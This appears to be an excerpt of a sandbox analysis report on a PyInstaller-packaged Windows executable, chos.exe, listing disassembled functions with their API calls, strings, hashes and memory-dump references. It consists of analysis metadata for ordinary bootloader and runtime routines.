Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction ID: 75352de53d19bd931c6f27d330535d147ff8730528c83e9a8f3c7933a4d02445
Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
Instruction Fuzzy Hash: B1517032A19642DADF15AF15F444A7867B1EB54B98F114234DA4A8F788EF7EE841CF00

Function 00007FF666DDEF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF666DDEFA7
_CallSETranslator.LIBVCRUNTIME ref: 00007FF666DDEFF3

Strings

RCC, xrefs: 00007FF666DDEFC3
MOC, xrefs: 00007FF666DDEFBB

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction ID: ca6196c17297d2878942c6bd9621b94790d593143f2afe29ef1bb1f412659e6b
Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
Instruction Fuzzy Hash: 14615B72908BC5C1EB60AB15F4403AAB7A0FB95B98F044235EA9C8BB95DF7DD194CF00

Function 00007FF666DDF2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF666DDF320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF666DDF408

Strings

csm, xrefs: 00007FF666DDF342
csm, xrefs: 00007FF666DDF45A

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: fcc104d4dc3769fcbb9f576f3b858e67d883da737c3fc65644cd5a59d25cb6e8
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: 3D517F32908382C6EB64AF25E54427876B0EB95B98F189335DA9D8F799CF3DE450CF01

Function 00007FF666DD2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF666DD28EA

Strings

ERROR, xrefs: 00007FF666DD286F
[PYI-%d:%ls] , xrefs: 00007FF666DD2868
Error, xrefs: 00007FF666DD28DD

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction ID: 19e518cc5f03ca846ab123d67236114579422530657a9bf800e70a47c1c1ff92
Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
Instruction Fuzzy Hash: B521A172B08B81D2E7209B54F8447EA63B4EB88784F404236EA8D9F655DE3DD645CB40

Function 00007FF666DEC610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF666DEC68F
WriteFile.KERNEL32 ref: 00007FF666DEC957
WriteFile.KERNEL32 ref: 00007FF666DEC99D
GetLastError.KERNEL32 ref: 00007FF666DECA53

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: 0084bf20b82fb0c057b0e893e9a4f66473e25c24cd126e81745f07eb041b5500
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction Fuzzy Hash: 4DD10372B18A81CAE710CF65E4402AC7BB1FB44798B448336DE6D9FB99DE39D006CB40

Function 00007FF666DD20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF666DD20F4
SetWindowLongPtrW.USER32 ref: 00007FF666DD2116
GetWindowLongPtrW.USER32 ref: 00007FF666DD2140
InvalidateRect.USER32 ref: 00007FF666DD2160

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: e130561b2ebb462236b7f929ccbcbd08a58709e6d61764b387589baf3e1ee3bd
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 0311A921A1C546C2F654A76AF6442795271EFC87C4F488230DB494FB99CD3FD5D58F00

Function 00007FF666DF5B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF666DF17D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF666DF1803

_get_daylight.LIBCMT ref: 00007FF666DF5CA4
_get_daylight.LIBCMT ref: 00007FF666DF5CB5

Strings

?, xrefs: 00007FF666DF5C35

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction ID: 5edc187f98dda19408bb26642a1cd7acd7df246fda081fac12f50c1828fc7b4c
Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction Fuzzy Hash: D941C732A08682C6FB649B25B44537967B0EBE0BA4F148335EE5D8EAD5DE3ED441CF00

Function 00007FF666DE9084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE90B6

Part of subcall function 00007FF666DEA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF666DF2D92,?,?,?,00007FF666DF2DCF,?,?,00000000,00007FF666DF3295,?,?,?,00007FF666DF31C7), ref: 00007FF666DEA9CE
Part of subcall function 00007FF666DEA9B8: GetLastError.KERNEL32(?,?,?,00007FF666DF2D92,?,?,?,00007FF666DF2DCF,?,?,00000000,00007FF666DF3295,?,?,?,00007FF666DF31C7), ref: 00007FF666DEA9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF666DDCC15), ref: 00007FF666DE90D4

Strings

C:\Users\user\Desktop\chos.exe, xrefs: 00007FF666DE90C2

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\chos.exe
API String ID: 3580290477-1382981800
Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction ID: 5f7fdb6e50b89d065cd602caa8ef6b1f74dae50049a71ae3fe3091a9b69a16c6
Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction Fuzzy Hash: FB416032A09B92C6EB14DF25F8400BDA7B4EF45BD4B954136E94D8FB85DE3EE4818B40

Function 00007FF666DECCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF666DECDBF
GetLastError.KERNEL32 ref: 00007FF666DECDE1

Strings

U, xrefs: 00007FF666DECD6B

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: c43b2c6a0e767b998898c6844a5d05d3ab17615e6fc186f30b1fcc3db75609b5
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: 2A418262B18A85C5DB209F25F4443A9AB74FB98794F444131EA4DCB798EF3ED441CB40

Function 00007FF666DEF628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF666DEF668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF666DEF6BA

Strings

:, xrefs: 00007FF666DEF67E

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
Instruction ID: 2dbdec6f4646f501b2c7a4e1be9502e79f13b144532f54e65683e3395323f6ae
Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
Instruction Fuzzy Hash: 9F21D263A186C1C2EB209B11F44426DA3B1FBC4B44F958239DA8C8F694DF7EE9458F80

Function 00007FF666DDFDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF666DDFE08
RaiseException.KERNEL32 ref: 00007FF666DDFE49

Strings

csm, xrefs: 00007FF666DDFE36

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: 1b6595b2e4853b488633649e3c2d09c80d53bb42815ba9645020b03f6d64f3e0
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: F3111932618B81C2EB618B15F440269B7E4FBC8B88F584230DE8D8B769EF3DD5518F00

Function 00007FF666DF07AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DF07DC
GetDriveTypeW.KERNEL32 ref: 00007FF666DF081C

Strings

:, xrefs: 00007FF666DF0805

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: 13e1b0857d95ce5ee381ae8bf4d98d152bc79a5c7a39c132d99e9b440e1b8b05
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: 7F012C62D1C643C6F720AB60B46627E63B0EF88748F850236E64DCF695EE3EE5448E54

Analysis Process: chos.exePID: 9888, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	2000
Total number of Limit Nodes:	62

Executed Functions

Function 00007FF7FD738BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7FD739400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7FD7345E4,00000000,00007FF7FD731985), ref: 00007FF7FD739439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF7FD733F7F), ref: 00007FF7FD738C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF7FD733F7F), ref: 00007FF7FD738C46

Part of subcall function 00007FF7FD74A4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD74A500

Part of subcall function 00007FF7FD74878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD7487F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF7FD733F7F), ref: 00007FF7FD738CD6
CreateProcessW.KERNELBASE ref: 00007FF7FD738D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7FD733F7F), ref: 00007FF7FD738D18

Part of subcall function 00007FF7FD732C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FD733706,?,00007FF7FD733804), ref: 00007FF7FD732C9E
Part of subcall function 00007FF7FD732C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FD733706,?,00007FF7FD733804), ref: 00007FF7FD732D63
Part of subcall function 00007FF7FD732C50: MessageBoxW.USER32 ref: 00007FF7FD732D99

RegisterClassW.USER32 ref: 00007FF7FD738D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7FD733F7F), ref: 00007FF7FD738D7B
CreateWindowExW.USER32 ref: 00007FF7FD738DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7FD733F7F), ref: 00007FF7FD738DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7FD733F7F), ref: 00007FF7FD738DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7FD733F7F), ref: 00007FF7FD738E05
PeekMessageW.USER32 ref: 00007FF7FD738E29
TranslateMessage.USER32 ref: 00007FF7FD738E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF7FD733F7F), ref: 00007FF7FD738E41
PeekMessageW.USER32 ref: 00007FF7FD738E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7FD733F7F), ref: 00007FF7FD738E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7FD733F7F), ref: 00007FF7FD738E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF7FD733F7F), ref: 00007FF7FD738E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7FD733F7F), ref: 00007FF7FD738EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7FD733F7F), ref: 00007FF7FD738EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF7FD733F7F), ref: 00007FF7FD738FF4
GetExitCodeProcess.KERNELBASE ref: 00007FF7FD739009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF7FD733F7F), ref: 00007FF7FD739012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF7FD733F7F), ref: 00007FF7FD73901F

Strings

PyInstaller Onefile Hidden Window, xrefs: 00007FF7FD738D85
PyInstallerOnefileHiddenWindow, xrefs: 00007FF7FD738D44
CreateProcessW, xrefs: 00007FF7FD738D27
Failed to create child process!, xrefs: 00007FF7FD738D20

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: 0c5f4aee0458cc50275a8134f333353b6dfe19cad6005861c598777ff1754bf4
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: E2D17232A0CA8286EB50AF74E8543B9B760FB88758F800235DA6D5B6D4EF3CD54587E1

Function 00007FF7FD731000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF7FD733971
pyi-runtime-tmpdir, xrefs: 00007FF7FD733B68
Failed to load splash screen resources!, xrefs: 00007FF7FD733E85
Failed to convert DLL search path!, xrefs: 00007FF7FD733DDC
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF7FD733B32
Py_GIL_DISABLED, xrefs: 00007FF7FD733AF4
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF7FD733D35
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF7FD733EA6
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF7FD733D12
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF7FD7339DE
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF7FD733EBB
VCRUNTIME140.dll, xrefs: 00007FF7FD733DB1
Failed to start splash screen!, xrefs: 00007FF7FD733ED4
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF7FD733A17, 00007FF7FD733A2F, 00007FF7FD733A9B
_PYI_SPLASH_IPC, xrefs: 00007FF7FD733A23, 00007FF7FD733EF5
_PYI_ARCHIVE_FILE, xrefs: 00007FF7FD7338D2, 00007FF7FD7339FF
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF7FD733A0B, 00007FF7FD733CD4, 00007FF7FD733F6B
Could not create temporary directory!, xrefs: 00007FF7FD733CBF
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF7FD733BE8
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF7FD733C61
pyi-disable-windowed-traceback, xrefs: 00007FF7FD733BB2
Failed to remove temporary directory: %s, xrefs: 00007FF7FD733FC3
pyi-contents-directory, xrefs: 00007FF7FD733B8D
MEI, xrefs: 00007FF7FD733933
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF7FD733882, 00007FF7FD7338AF
pkg, xrefs: 00007FF7FD7339BE
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF7FD733E0A
pyi-python-flag, xrefs: 00007FF7FD733AD6

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
